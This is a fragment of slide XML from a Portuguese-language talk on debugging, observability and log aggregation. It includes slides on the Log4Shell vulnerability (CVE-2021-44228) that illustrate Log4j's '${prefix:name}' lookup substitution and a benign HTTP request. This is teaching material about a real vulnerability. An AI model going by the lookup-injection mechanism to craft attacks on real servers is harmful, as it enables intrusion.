              </a:rPr>
              <a:t>    at com.example.TransactionService.validateTransaction(TransactionService.java:20)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    at com.example.Main.main(Main.java:10)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Caused by: java.lang.IllegalStateException: Invalid transaction state</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    at com.example.PaymentProcessor.validate(PaymentProcessor.java:25)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    at com.example.TransactionService.processPayment(TransactionService.java:43)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ... 3 more</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8322275" y="3155525"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="152400"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>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3" name="Shape 603"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Google Shape;604;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1685875"/>
            <a:ext cx="8668800" cy="6093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3600"/>
              <a:t>Observabilidade</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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9" name="Shape 609"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Google Shape;610;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="1511825"/>
            <a:ext cx="2283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Agrega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção de Logging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="611" name="Google Shape;611;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="331925"/>
            <a:ext cx="5516755" cy="3973377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158425" y="2036075"/>
            <a:ext cx="2271900" cy="1101000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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6" name="Shape 616"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="3645425"/>
            <a:ext cx="3009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Observabilidade</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Google Shape;618;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432525" y="107725"/>
            <a:ext cx="5262299" cy="4928049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p88"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014800" y="3993500"/>
            <a:ext cx="978600" cy="9000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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3" name="Shape 623"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="624" name="Google Shape;624;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061475" y="572625"/>
            <a:ext cx="7249498" cy="4077826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404175" y="4796050"/>
            <a:ext cx="25641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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.elastic.co/pt/kibana</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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AFAFA"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="629" name="Shape 629"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095400" y="679325"/>
            <a:ext cx="7344600" cy="85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Proxima Nova"/>
              <a:ea typeface="Proxima Nova"/>
              <a:cs typeface="Proxima Nova"/>
              <a:sym typeface="Proxima Nova"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437475" y="1305475"/>
            <a:ext cx="7930500" cy="9822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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilidade de Segurança: Log4Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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6" name="Shape 636"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p9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Log4Shell (CVE-2021-44228)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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639" name="Google Shape;639;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15109" l="2500" r="8831" t="-3777"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331887" y="1439313"/>
            <a:ext cx="6234486" cy="2264876"/>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AFAFA"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="643" name="Shape 643"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Google Shape;644;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095400" y="679325"/>
            <a:ext cx="7344600" cy="85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Proxima Nova"/>
              <a:ea typeface="Proxima Nova"/>
              <a:cs typeface="Proxima Nova"/>
              <a:sym typeface="Proxima Nova"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232925" y="391075"/>
            <a:ext cx="8617800" cy="1444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solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// Log4J ver. 2 (2013)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// string substitution, ${prefix:name}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>String data = "${java:version}";   </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>logger.info(data);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// Java version 1.7.0_67</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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0" name="Shape 650"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616500" y="445025"/>
            <a:ext cx="3006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Log4J Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Google Shape;652;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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653" name="Google Shape;653;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587475" y="1459450"/>
            <a:ext cx="5679600" cy="10158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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: example.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Mozilla/5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474475" y="1854800"/>
            <a:ext cx="20571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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9EAD3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Acesso normal</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9EAD3"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="655" name="Google Shape;655;p93"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3072050" y="781225"/>
            <a:ext cx="1606200" cy="1299000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841875" y="373850"/>
            <a:ext cx="41691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rPr>
              <a:t>Informação que normalmente é logada </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="216425"/>
            <a:ext cx="8798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Bug devido a hardware com comportamento diferente</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p31"/>
          <p:cNvSpPr txBox="1"/>
